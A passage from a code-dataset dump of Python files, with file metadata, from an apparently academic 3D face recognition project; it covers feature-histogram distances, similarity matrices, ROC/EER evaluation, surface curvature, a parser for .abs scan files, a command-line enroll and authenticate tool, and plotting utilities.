distance_histogram_euclidean(face1, face2):\n \"\"\" \n Calculate the Euclidean distance of two histogram feature vectors \n \"\"\"\n\n def _func(U, V, U_V):\n return numpy.sqrt(numpy.sum([ numpy.power(Ui - Vi, 2) for Ui, Vi in U_V ]))\n\n return distance_histogram(face1, face2, _func)\n\ndef distance_histogram_correlation(face1, face2):\n \"\"\"\n Calculate the Sample Correlation Coefficient of two histogram feature vectors\n \"\"\"\n\n def _func(U, V, U_V):\n Umean = U.mean()\n Vmean = V.mean()\n Ustd = U.std()\n Vstd = V.std()\n\n samples = [ (Ui - Umean)*(Vi - Vmean) for Ui, Vi in U_V ]\n return numpy.sum(samples) / ((len(samples) - 1) * Ustd * Vstd)\n\n return distance_histogram(face1, face2, _func)\n\ndef distance_histogram(face1, face2, func):\n \"\"\" Base method for distance funcions \"\"\"\n\n U = face1.features[1]\n V = face2.features[1]\n\n # Make sure both are same size\n if U.shape != V.shape:\n raise Exception(\"Feature vectors do not match size\")\n\n # Calculate the distance\n return func(U, V, zip(U, V))\n\ndef similarity_matrix(faces, methods=None, normalizers=None, limit=None):\n \"\"\" \n Calculate the similarity matrix for given set of faces with a given \n set of methods and normalizers. 
For each method, a seperate thread will\n be spawned\n \"\"\"\n\n # Set default methods\n if not methods:\n methods = [distance_histogram_euclidean, distance_histogram_city_block, distance_histogram_correlation]\n\n # Set default normalizers\n if not normalizers:\n normalizers = [score_normalization_min_max, score_normalization_min_max, False]\n\n # Create output array\n output = numpy.zeros(shape=(len(methods), len(faces), len(faces)))\n output[:] = numpy.nan\n\n # Precalculations\n count_faces = len(faces)\n count_methods = len(methods)\n count_faces_limited = count_faces if not limit else limit\n threads = []\n\n # Iterate each face\n def _func(index, method, normalizer):\n # Create similarity matrix\n for i in range(count_faces_limited):\n if i % 25 == 0:\n print \"Method %d: %d/%d\" % (index, i, count_faces)\n\n for j in range(i, count_faces):\n output[(index, i, j)] = method(faces[i], faces[j])\n\n # Normalize matrix\n if normalizer: \n normalizer(output[index])\n\n # Print some info\n print \"Finished similarity matrix for method %d\" % index\n\n # Spawn the threads\n for i in range(count_methods):\n thread = threading.Thread(target=_func, args=(i, methods[i], normalizers[i]))\n thread.daemon = True\n threads.append(thread)\n thread.start()\n\n # Wait for all threads to complete\n for thread in threads: \n thread.join()\n\n # Done\n return output\n\ndef score_normalization_min_max(matrix):\n \"\"\" In place normalization to min-max scores \"\"\"\n\n # Calculate min/max\n dmin = numpy.nanmin(matrix)\n dmax = numpy.nanmax(matrix)\n\n # In-place transformation\n matrix -= dmin\n matrix /= (dmax - dmin)\n\n # Convert to score\n numpy.subtract(1, matrix, matrix)\n\ndef calculate_roc_eer(matrix, person_ids):\n \"\"\" Calculate the ROC curve and estimate the EER \"\"\"\n\n methods, _, _ = matrix.shape\n count = len(person_ids)\n result = [False, False, False]\n threads = []\n\n # Calculate ROC curve and EER for each method\n def _func(index):\n targets = []\n outputs = []\n\n for i in range(count):\n #if i % 25 == 0:\n #print \"Method %d: %d/%d\" % (index, i, count)\n\n for j in range(i, count):\n if person_ids[i] == person_ids[j]:\n targets.append(1)\n else:\n targets.append(0)\n\n outputs.append(matrix[index][i][j])\n\n # Calculate ROC curve\n tpr, fpr, _ = metrics.roc_curve(targets, outputs)\n\n # Create three function for solving\n f = interpolate.interp1d(tpr, fpr, bounds_error=False)\n g = lambda x: 1 - x\n \n # Estimate the EER -- the intersection of f(x) and g(x)\n for x in numpy.linspace(0, 1, 1000):\n # Skip boundaries as they are invalid for the interpolator\n if x == 0.0 or x == 1.0: \n continue\n\n # Check intersection point\n if f(x) >= g(x):\n eer = x\n break\n\n # Append data to result list\n result[index] = ((tpr, fpr), eer)\n\n # Print some info\n print \"Finished ROC and EER for method %d\" % index\n\n \n # Spawn the threads\n for i in range(methods):\n thread = threading.Thread(target=_func, args=(i,))\n thread.daemon = True\n threads.append(thread)\n thread.start()\n\n # Wait for all threads to complete\n for thread in threads: \n thread.join()\n \n # Done\n return result\n\ndef surfature(face):\n \"\"\" \n Calculate the surfatures of a given face. 
Based on a Matlab implementation\n http://stackoverflow.com/questions/11317579/surface-curvature-matlab-equivalent-in-python\n \"\"\"\n\n # First derivatives\n Xu, Xv = numpy.gradient(face.X)\n Yu, Yv = numpy.gradient(face.Y)\n Zu, Zv = numpy.gradient(face.Z)\n\n # Second derivates\n Xuu, Xuv = numpy.gradient(Xu)\n Yuu, Yuv = numpy.gradient(Yu)\n Zuu, Zuv = numpy.gradient(Zu)\n\n Xuv, Xvv = numpy.gradient(Xv)\n Yuv, Yvv = numpy.gradient(Yv)\n Zuv, Zvv = numpy.gradient(Zv)\n\n # Reshape to vector\n Xu = Xu.reshape(-1, 1)\n Yu = Yu.reshape(-1, 1)\n Zu = Zu.reshape(-1, 1)\n\n Xv = Xv.reshape(-1, 1)\n Yv = Yv.reshape(-1, 1)\n Zv = Zv.reshape(-1, 1)\n\n Xuu = Xuu.reshape(-1, 1)\n Yuu = Yuu.reshape(-1, 1)\n Zuu = Zuu.reshape(-1, 1)\n\n Xuv = Xuv.reshape(-1, 1)\n Yuv = Yuv.reshape(-1, 1)\n Zuv = Zuv.reshape(-1, 1)\n\n Xvv = Xvv.reshape(-1, 1)\n Yvv = Yvv.reshape(-1, 1)\n Zvv = Zvv.reshape(-1, 1)\n\n # Reshape data\n XYZu = numpy.concatenate((Xu, Yu, Zu), 1)\n XYZv = numpy.concatenate((Xv, Yv, Zv), 1)\n XYZuu = numpy.concatenate((Xuu, Yuu, Zuu), 1)\n XYZuv = numpy.concatenate((Xuv, Yuv, Zuv), 1)\n XYZvv = numpy.concatenate((Xvv, Yvv, Zvv), 1)\n\n # First fundamental coefficients\n E = numpy.sum(XYZu * XYZu, 1)\n F = numpy.sum(XYZu * XYZv, 1)\n G = numpy.sum(XYZv * XYZv, 1)\n \n m = numpy.cross(XYZu, XYZv)\n p = numpy.sqrt(numpy.sum(m * m, 1))\n n = numpy.divide(m, numpy.array([p, p, p]).T)\n\n # Second fundamental coefficients\n L = numpy.sum(XYZuu * n, 1)\n M = numpy.sum(XYZuv * n, 1)\n N = numpy.sum(XYZvv * n, 1)\n\n # Retrieve size\n s, t = face.Z.shape\n\n # Gaussian curvature\n K1 = numpy.multiply(L, N) - numpy.power(M, 2)\n K2 = numpy.multiply(E, G) - numpy.power(F, 2)\n K = numpy.divide(K1, K2).reshape(s, t)\n\n # Mean curvature\n H1 = numpy.multiply(E, N) + numpy.multiply(G, L) - numpy.multiply(numpy.multiply(2, F), M)\n H2 = numpy.multiply(2, numpy.multiply(E, G) - numpy.power(F, 2))\n H = numpy.divide(H1, H2).reshape(s, t)\n\n # Determine min and max curvatures\n Pmax = H + numpy.sqrt(numpy.power(H, 2) - K)\n Pmin = H - numpy.sqrt(numpy.power(H, 2) - K)\n\n # Done\n return K, H, Pmax, Pmin"
},
{
"alpha_fraction": 0.4914458096027374,
"alphanum_fraction": 0.49849045276641846,
"avg_line_length": 32.505619049072266,
"blob_id": "da4207ece0249bfd1e96e95294551be79b3f645b",
"content_id": "da79907d7078766b1035073bc32e61a814b26159",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2981,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 89,
"path": "/face3d/absfile.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nimport os\nimport numpy\n\nclass AbsFile(object):\n # Class variables\n invalid_value = -999999\n\n def __init__(self, filename):\n # Check if file exists\n if not os.path.exists(filename):\n raise Exception(\"Data file does not exist\")\n\n # Create variables\n self.data = {}\n self.row_size = False\n self.col_size = False\n\n # Now read the file and create an XYZ matrix\n with open(filename, 'r') as file_handle:\n # Helper for dimension\n def read_dimension(dimension):\n line = file_handle.readline()\n data = line.strip().split(\" \")\n\n if len(data) == 2 and data[1] == dimension:\n return int(data[0])\n else:\n raise Exception(\"Invalid header: expected '%s'\" % dimension)\n\n # Helper for data order\n def read_data_type():\n line = file_handle.readline()\n data = line.strip().split(\" \", 1)\n\n if len(data) == 2 and data[0] == \"pixels\":\n return data[1][1:-2].split(\" \")\n else:\n raise Exception(\"Invalid header: expected data type\")\n\n # Helper for reading data lines\n def read_data(data_type):\n # Initialize result array\n data_type = numpy.int if data_type == 'flag' else numpy.float\n result = numpy.zeros(self.col_size * self.row_size, dtype=data_type)\n index = 0\n\n # Read line\n line = file_handle.readline()\n data = line.strip().split(\" \")\n\n for value in data:\n try:\n if value != '':\n # Convert string to correct format\n result[index] = data_type(value)\n\n # Increment index\n index = index + 1\n except ValueError:\n print \"Unexpected input: expected '%s', got '%s'\" % (data_type, value)\n\n # In case of invalid values, mask invalid values\n if data_type == numpy.float:\n result[result == AbsFile.invalid_value] = numpy.nan\n\n # Return reshaped array\n return result.reshape(self.row_size, self.col_size)\n\n # Read the header of the file\n self.row_size = read_dimension('rows')\n self.col_size = read_dimension('columns')\n self.data_type = read_data_type()\n\n # Read the actual data\n for current_data_type in self.data_type:\n self.data[current_data_type] = read_data(current_data_type)\n\n @property\n def width(self):\n return self.col_size\n\n @property\n def height(self):\n return self.row_size"
},
{
"alpha_fraction": 0.5873394012451172,
"alphanum_fraction": 0.5917637944221497,
"avg_line_length": 30.850948333740234,
"blob_id": "a40f514e730f1b3340a4d09751fc473664ed437e",
"content_id": "4d6c282b4cd685339ddf137940c891ba2e7e1906",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11753,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 369,
"path": "/Face3D.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom face3d import AbsFile, Face, Database\nfrom face3d import utils, algorithms\n\nimport argparse\nimport glob\nimport os\nimport sys\nimport numpy\nimport threading\n\nparameters = {\"N\": 67, \"K\": 12}\nparameter_types = {\"N\": int, \"K\": int}\ndatabase = None\ndebug = False\n\ndef Run(arguments):\n global database, parameters\n success = False\n result = False\n\n # Initialize a database\n database = Database(arguments.database)\n\n # Enrollment\n if arguments.enroll:\n success = True\n is_directory, path = arguments.enroll\n\n if is_directory:\n mask = \"%s/*.abs\"\n if arguments.mask:\n mask = \"%s/*\"+arguments.mask+\"*.abs\"\n files = glob.glob(mask % path)\n thread_count = 16\n chunks = [files[i::thread_count] for i in range(thread_count)]\n threads = []\n\n # Process each thread\n for chunk in chunks:\n thread = threading.Thread(\n target=lambda x: [enroll_face(c, arguments.person_id, arguments.auto_id) for c in x], args=(chunk,))\n thread.daemon = True\n threads.append(thread)\n thread.start()\n\n # Wait for the threads to finish\n for thread in threads:\n thread.join()\n\n else:\n enroll_face(path.name, arguments.person_id, arguments.auto_id)\n\n # Caches for\n faces = False\n matrix = False\n rocs = False\n\n if arguments.copy_to_database and arguments.mask:\n database2 = Database(arguments.copy_to_database)\n faces_to_copy = [f for f in list(database.iterator()) if arguments.mask in f[0]];\n for file_name, person_id, face in faces_to_copy:\n if database.exists(file_name):\n print \"File '%s' already exists\" % file_name\n continue\n database2.save(file_name, person_id, face)\n\n # Authenticating\n if arguments.authenticate:\n print \"Authenticating face from '%s'\" % arguments.authenticate\n success = True\n\n # Create face from file\n face = Face(AbsFile(arguments.authenticate))\n\n # Normalize it\n algorithms.process(face, parameters[\"N\"], parameters[\"K\"])\n\n # Get the other data\n if not faces:\n faces = list(database.iterator())\n matrix = algorithms.similarity_matrix([face] + [face[2] for face in faces], limit=1) # One line matrix\n\n # Evaluate result\n methods, _, _ = matrix.shape\n tresholds = [0.00, 0.00, 0.00]\n result = 3*[None]\n\n for i in range(methods):\n # Select indexes of candidates\n vector = numpy.array(matrix[i][0][1:])\n candidates, = numpy.where(vector >= tresholds[i])\n persons = {}\n\n # Verify candidates\n if len(candidates) == 0:\n #print \"Method %d does not yield any candidates!\" % i\n continue\n\n # Print method\n #print \"Results for method %d:\" % i\n\n # Print each candidate\n for candidate in candidates:\n\n filename, person_id, data = faces[candidate]\n\n # Add person to list of persons\n if person_id not in persons:\n persons[person_id] = []\n\n persons[person_id].append(matrix[i][0][candidate + 1])\n\n result[i] = [(person, [\"%.2f\" % s for s in scores]) for person, scores in persons.iteritems()]\n # Print results\n # for person, scores in persons.iteritems():\n # print \"Match with person %s with scores %s\" % (person, [\"%.2f\" % s for s in scores])\n\n # Reevaluation\n if arguments.reevaluate:\n print \"Reevaluate faces\"\n success = True\n\n # Get data\n if not faces: faces = list(database.iterator())\n\n # Action\n [algorithms.features_histogram(face[2], parameters[\"N\"], parameters[\"K\"]) for face in faces]\n\n # Visualizing\n if arguments.depth_map:\n print \"Generating depth map\"\n success = 
True\n\n # Get data\n if not faces: faces = list(database.iterator())\n\n # Action\n utils.generate_depth_map(faces, arguments.depth_map, arguments.draw_key_points)\n\n if arguments.feature_map:\n print \"Generating feature map\"\n success = True\n\n # Get data\n if not faces: faces = list(database.iterator())\n\n # Action\n utils.generate_feature_map(faces, arguments.feature_map)\n\n if arguments.similarity_matrix:\n print \"Generating similarity matrix\"\n success = True\n\n # Get data\n if not faces: faces = list(database.iterator())\n if not matrix: matrix = algorithms.similarity_matrix([face[2] for face in faces])\n\n # Action\n utils.generate_similarity_matrix(matrix, faces, arguments.similarity_matrix)\n\n if arguments.roc_curve:\n print \"Generating ROC curve\"\n success = True\n\n # Get data\n if not faces: faces = [f for f in list(database.iterator()) if f ]\n if not matrix: matrix = algorithms.similarity_matrix([face[2] for face in faces])\n if not rocs: rocs = algorithms.calculate_roc_eer(matrix, [face[1] for face in faces])\n\n utils.generate_roc_curve(rocs, arguments.roc_curve)\n\n return success, result\n\n\ndef RunByParams(authenticate=None,\n enroll=None,\n person_id=None,\n auto_id=False,\n reevaluate=False,\n depth_map=None,\n feature_map=None,\n similarity_matrix=None,\n roc_curve=None,\n draw_key_points=False,\n copy_to_database = None,\n mask = None,\n database='database.db',\n parametes='K=12,N=67'):\n\n argument = type(\"\", (), {})()\n argument.database = database\n argument.copy_to_database = copy_to_database\n argument.mask = mask\n argument.parameters = parametes\n argument.authenticate = None\n if authenticate is not None and os.path.exists(authenticate) and not os.path.isdir(authenticate):\n argument.authenticate = authenticate\n\n path = os.path.realpath(enroll)\n argument.enroll = None\n # Then check path\n if enroll is not None and os.path.exists(enroll):\n if os.path.isdir(path):\n argument.enroll = (True, path)\n else:\n argument.enroll = (False, open(path, \"rb\"))\n\n argument.person_id = person_id\n argument.auto_id = auto_id\n argument.reevaluate = reevaluate\n\n argument.depth_map = depth_map\n argument.feature_map = feature_map\n argument.similarity_matrix = similarity_matrix\n argument.roc_curve = roc_curve\n argument.draw_key_points = draw_key_points\n\n return Run(argument)\n\ndef RunByCmd():\n global database, parameters\n\n # Parse arguments\n arguments, parser = argument_parser()\n\n # Parse parameters\n try:\n for parameter in arguments.parameters.split(','):\n key, value = parameter.split('=', 1)\n parameters[key] = value\n except:\n print \"Invalid parameters: %s\" % arguments.parameters\n sys.exit(1)\n\n # Make sure parameters are of right type\n for key, value in parameters.iteritems():\n try:\n parameters[key] = parameter_types[key](value)\n except:\n print \"Parameter '%s' of incorrect type\" % key\n sys.exit(1)\n\n (success, result) = Run(arguments)\n\n if not success:\n parser.print_help()\n sys.exit(1)\n else:\n if result:\n for i, res in enumerate(result):\n print \"Mathod %d\" % (i)\n for p, s in res:\n print \"Match with person %s with scores %s\" % (p, s)\n\n sys.exit(0)\n\n\ndef enroll_face(file, person_id=None, auto_id=False, force=False):\n\n try:\n filename = os.path.basename(file)\n \n # Check for duplicates\n if database.exists(file) and not force:\n print \"File '%s' already enrolled\" % filename\n return\n\n # Make sure we have an identifier\n if not person_id and not auto_id:\n print \"Auto person identification disabled 
and no identification specified.\"\n return\n\n # File not yet enrolled\n print \"Processing %s\" % filename\n\n # Read data file\n absfile = AbsFile(file)\n\n # Derrive filename\n if auto_id:\n basename = os.path.basename(file)\n person_id = basename[:basename.index('d')]\n\n # Create Face object\n face = Face(absfile)\n\n # Apply algorithms to process raw data\n\n # Apply selected algorithms\n algorithms.process(face, parameters[\"N\"], parameters[\"K\"])\n\n # Compress data\n face.compress()\n except:\n print \"File '%s' failed\" % file\n \n # In debug mode, show exceptions\n if debug:\n raise\n else:\n return\n\n # Enroll to database\n database.save(file, person_id, face)\n\ndef argument_parser():\n # Helper for argparse to match file and/or directory\n def helper_file_or_directory(parser):\n def _inner(path):\n # First, resolve\n path = os.path.realpath(path)\n\n # Then check path\n if not os.path.exists(path):\n parser.error(\"The file or directory '%s' does not exist\" % path)\n else:\n if os.path.isdir(path):\n return (True, path)\n else:\n return (False, open(path, \"rb\"))\n return _inner\n\n # Helper for argparse to match file\n def helper_file(parser):\n def _inner(file):\n # First, resolve\n path = os.path.realpath(file)\n\n # Then check path\n if not os.path.exists(file) or os.path.isdir(file):\n parser.error(\"The file '%s' does not exist\" % path)\n\n # Done\n return file\n return _inner\n\n # Create parser\n parser = argparse.ArgumentParser(description='Enroll, match and visualize 3D faces')\n\n # Add the arguments\n parser.add_argument('-d', '--database', default='database.db', help='path to cache file')\n parser.add_argument('-p', '--parameters', default='K=12,N=67', action='store', help='algorithm parameters, comma seperated')\n\n group = parser.add_argument_group(title=\"Face management\")\n group.add_argument('--authenticate', type=helper_file(parser), help='authenticate a face to enrolled faces')\n group.add_argument('--enroll', type=helper_file_or_directory(parser), help='enroll face from file or directory')\n group.add_argument('--person-id', action='store', help='number or name identifing person')\n group.add_argument('--auto-id', action='store_true', help='derrive person identifier from filename')\n group.add_argument('--reevaluate', action='store_true', help='reevaluation enrolled faces, but do not save')\n\n group = parser.add_argument_group(title=\"Visualization\")\n group.add_argument('--depth-map', action='store', help='generate a depth map of enrolled faces')\n group.add_argument('--feature-map', action='store', help='generate a feature map of enrolled faces')\n group.add_argument('--similarity-matrix', action='store', help='generate a similarity matrix of all implemented methods')\n group.add_argument('--roc-curve', action='store', help='generate a ROC curve of all implemented methods')\n group.add_argument('--draw-key-points', action='store_true', help='include key points on depth map')\n\n # Done\n return parser.parse_args(), parser\n\n\n# Application main\nif __name__ == '__main__':\n RunByCmd()\n"
},
{
"alpha_fraction": 0.5901366472244263,
"alphanum_fraction": 0.6142054796218872,
"avg_line_length": 30.544857025146484,
"blob_id": "7d2320ce4e693499c95bae6fb9f2cb5df8383e71",
"content_id": "11685c87c0f4c833c7f3bb8c368e32b2d3e34b51",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14417,
"license_type": "permissive",
"max_line_length": 240,
"num_lines": 457,
"path": "/face3d/utils.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom matplotlib import pyplot\nfrom scipy import signal\n\nimport numpy\nimport scipy\nimport math\nimport os\n\ndef max_xy(input, offset_x=0, offset_y=0):\n index = numpy.nanargmax(input)\n y, x = numpy.unravel_index(index, input.shape)\n return x + offset_x, y + offset_y\n\ndef min_xy(input, offset_x=0, offset_y=0):\n index = numpy.nanargmin(input)\n y, x = numpy.unravel_index(index, input.shape)\n return x + offset_x, y + offset_y\n\ndef find_peak_start(input, treshold=0.001, peak_length=15):\n input = numpy.abs(numpy.gradient(signal.bspline(input, 25)))\n\n # Control parameters\n input_treshold = numpy.nanmax(input) * treshold\n input_length = input.shape[0]\n recording = False\n start_x = 0\n stop_x = 0\n\n # Walk from start to end. When the current value exceeds threshold,\n # start recording.\n for i in range(0, input_length):\n if recording:\n if input[i] > treshold:\n stop_x = i\n\n if (stop_x - start_x) > peak_length:\n return start_x\n else:\n recording = False\n else:\n if input[i] > treshold:\n start_x = i\n recording = True\n\n # Nothing found\n return 0\n\ndef find_peak_stop(input, *args):\n # Apply the start search but reverse array\n x = find_peak_start(input[::1], *args)\n\n # Reverse result\n return input.shape[0] - x\n\ndef face(index=0, fit=True, N=67, K=12, interpolation=True):\n from absfile import AbsFile\n from face import Face\n import algorithms\n\n file = ['test_16/04371d164.abs', 'test_same/04203d350.abs', 'test_same/04203d352.abs', 'test_same/04203d354.abs', 'test_8/04316d216.abs', 'test_4/04374d193.abs'][index]\n face = Face(AbsFile(file))\n \n if interpolation:\n algorithms.repair(face)\n\n algorithms.smooth(face)\n algorithms.crop(face)\n algorithms.zoom(face)\n algorithms.key_points(face)\n algorithms.rotate(face)\n\n if fit:\n algorithms.key_points(face)\n algorithms.fit(face)\n\n # Extract features\n algorithms.features_histogram(face, N, K)\n\n return face\n\ndef evaluate_interpolation(output_file='interpolate.pdf'):\n f = face(5, interpolation=False)\n g = face(5)\n figure = pyplot.figure()\n\n subplot = pyplot.subplot(1, 2, 1)\n subplot.imshow(f.Z)\n\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 2, 2)\n subplot.imshow(g.Z)\n\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\ndef evaluate_features(output_file='features.pdf'):\n import algorithms\n blue = (0.0, 0.0, 1.0, 1.0)\n g = face(1, True, 18, 12)\n h = face(2, True, 18, 12)\n f = face(3, True, 18, 12)\n k = face(0, True, 18, 12)\n\n figure = pyplot.figure()\n\n subplot = pyplot.subplot(1, 5, 1)\n\n subplot.imshow(g.Z)\n\n for xx in range(1, 8):\n v = int((xx) * (g.height / 8))\n subplot.axhline(v, color=blue)\n\n subplot.set_xlabel('Different regions (N=8)')\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 5, 2)\n subplot.imshow(g.features[1].reshape(g.features[2]))\n subplot.set_xlabel('Person 1a')\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 5, 3)\n subplot.imshow(h.features[1].reshape(h.features[2]))\n subplot.set_xlabel('Person 1b')\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 5, 4)\n 
subplot.imshow(f.features[1].reshape(f.features[2]))\n subplot.set_xlabel('Person 1c')\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 5, 5)\n subplot.imshow(k.features[1].reshape(k.features[2]))\n subplot.set_xlabel('Person 2a') \n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False) \n\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\ndef evaluate_feature_extraction(output_file='face.pdf', output2_file='surfature.pdf', output3_file='mouth.pdf'):\n import algorithms\n f = face(4, fit=False)\n g = face(4)\n h = face(1)\n grey = (0.7, 0.7, 0.7, 0.7)\n K, H, Pmax, Pmin = algorithms.surfature(f)\n\n ########\n\n figure = pyplot.figure()\n\n subplot = pyplot.subplot(1, 1, 1)\n subplot.imshow(h.abs_file.data['Z'])\n\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n figure.savefig(\"raw.pdf\", format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n ########\n\n figure = pyplot.figure()\n\n subplot = pyplot.subplot(1, 1, 1)\n subplot.imshow(f.Z)\n\n for name, point in f.key_points.iteritems():\n x, y = point\n subplot.plot(x, y, 'x', color='k') \n\n nose_x, nose_y = f.key_points['nose']\n lip_x, lip_y = f.key_points['lip']\n chin_x, chin_y = f.key_points['chin']\n\n nose_left_x, nose_left_y = f.key_points['nose_left']\n nose_right_x, nose_right_y = f.key_points['nose_right']\n lip_left_x, lip_left_y = f.key_points['lip_left']\n lip_right_x, lip_right_y = f.key_points['lip_right']\n\n border_lip_left_x, border_lip_left_y = f.key_points['border_lip_left']\n border_lip_right_x, border_lip_right_y = f.key_points['border_lip_right']\n\n pyplot.plot([nose_left_x, nose_right_x], [nose_left_y, nose_right_y], color=\"K\")\n pyplot.plot([lip_left_x, lip_right_x], [lip_left_y, lip_right_y], color=\"K\")\n\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n ########\n\n figure = pyplot.figure()\n\n subplot = pyplot.subplot(1, 1, 1)\n subplot.imshow(g.Z)\n\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n figure.savefig(\"face2.pdf\", format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n ########\n\n figure = pyplot.figure(figsize=(10, 5))\n\n subplot = pyplot.subplot(1, 1, 1)\n #subplot.plot(K[:, nose_x])\n a, = subplot.plot(H[:, nose_x] * 2)\n #subplot.plot(Pmin[:, nose_x])\n b, = subplot.plot(Pmax[:, nose_x])\n c, = subplot.plot(f.Z[:, nose_x] / 50)\n\n subplot.set_xlabel('Vertical Face Position')\n subplot.set_ylabel('Value')\n subplot.axvline(nose_y, color=grey)\n subplot.axvline(lip_y, color=grey)\n subplot.axvline(chin_y, color=grey)\n subplot.legend([a, b, c], [\"Mean\", \"Pmax\", \"Original\"])\n\n figure.show()\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n ##########\n figure = pyplot.figure(figsize=(10, 5))\n\n subplot = pyplot.subplot(1, 2, 1)\n\n #a, = subplot.plot(Pmax[(lip_y - 5):(lip_y + 5), :])\n a, = subplot.plot(H[lip_y, :])\n b, = subplot.plot(Pmax[lip_y, :] * 2)\n c, = subplot.plot(f.Z[lip_y, :] / 20)\n\n subplot.set_xlabel('Horizontal Face Position')\n subplot.set_ylabel('Value')\n subplot.axvline(lip_right_x, color=grey)\n subplot.axvline(lip_left_x, color=grey)\n subplot.axvline(border_lip_left_x, color=grey)\n subplot.axvline(border_lip_right_x, color=grey)\n subplot.legend([a, b, c], [\"Mean\", 
\"Pmax\", \"Original\"])\n\n subplot = pyplot.subplot(1, 2, 2)\n\n a, = subplot.plot(numpy.nansum(H[(lip_y - 5):(lip_y + 5), :], axis=0))\n b, = subplot.plot(numpy.nansum(Pmax[(lip_y - 5):(lip_y + 5), :], axis=0) * 2)\n c, = subplot.plot(numpy.nansum(f.Z[(lip_y - 5):(lip_y + 5), :], axis=0) / 100)\n\n subplot.set_xlabel('Horizontal Face Position (summed)')\n subplot.set_ylabel('Value')\n subplot.axvline(lip_right_x, color=grey)\n subplot.axvline(lip_left_x, color=grey)\n subplot.axvline(border_lip_left_x, color=grey)\n subplot.axvline(border_lip_right_x, color=grey)\n subplot.legend([a, b, c], [\"Mean\", \"Pmax\", \"Original\"])\n\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n\ndef evaluate_rotate(rotations=[-5.0, -2.5, -1.0, 1, 2.5, 5.0], index=4, output_file='rotations.pdf'):\n from scipy.ndimage import interpolation\n import algorithms\n\n original = face(index)\n other = face(1)\n faces = []\n\n for rotation in rotations:\n f = face(index)\n\n f.abs_file.data['X'] = interpolation.rotate(f.abs_file.data['X'], rotation, mode='nearest', prefilter=False, reshape=False)\n f.abs_file.data['Y'] = interpolation.rotate(f.abs_file.data['Y'], rotation, mode='nearest', prefilter=False, reshape=False)\n f.abs_file.data['Z'] = interpolation.rotate(f.abs_file.data['Z'], rotation, mode='nearest', prefilter=False, reshape=False)\n\n algorithms.features_histogram(f)\n faces.append(f)\n\n pyplot.figure()\n\n subplot = pyplot.subplot(1, 2+len(rotations), 1)\n\n subplot.imshow(original.Z)\n subplot.title.set_text(\"Original\")\n subplot.title.set_fontsize(10)\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n for rotation, f, i in zip(rotations, faces, range(len(rotations))):\n subplot = pyplot.subplot(1, 2+len(rotations), 2 + i)\n subplot.imshow(f.Z)\n subplot.title.set_text(\"%.1f deg\" % rotation)\n subplot.title.set_fontsize(10)\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 2+len(rotations), len(rotations) + 2)\n subplot.imshow(other.Z)\n subplot.title.set_text(\"Other\")\n subplot.title.set_fontsize(10)\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n pyplot.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n return algorithms.similarity_matrix([original] + faces + [other], methods=[algorithms.distance_histogram_euclidean, algorithms.distance_histogram_city_block, algorithms.distance_histogram_correlation], normalizers=[False, False, False])\n\ndef chunks(l, n):\n for i in xrange(0, len(l), n):\n yield l[i:i+n]\n\ndef raw_moment(data, iord, jord):\n nrows, ncols = data.shape\n y, x = numpy.mgrid[:nrows, :ncols]\n data = data * x**iord * y**jord\n\n return data.sum()\n\ndef intertial_axis(data):\n \"\"\"Calculate the x-mean, y-mean, and cov matrix of an image.\"\"\"\n\n data_sum = data.sum()\n m10 = raw_moment(data, 1, 0)\n m01 = raw_moment(data, 0, 1)\n x_bar = m10 / data_sum\n y_bar = m01 / data_sum\n u11 = (raw_moment(data, 1, 1) - x_bar * m01) / data_sum\n u20 = (raw_moment(data, 2, 0) - x_bar * m10) / data_sum\n u02 = (raw_moment(data, 0, 2) - y_bar * m01) / data_sum\n cov = numpy.array([[u20, u11], [u11, u02]])\n\n return x_bar, y_bar, cov\n\ndef generate_base_map(faces, func, output_file):\n # Make sure there is data\n if not faces or len(faces) == 0:\n print 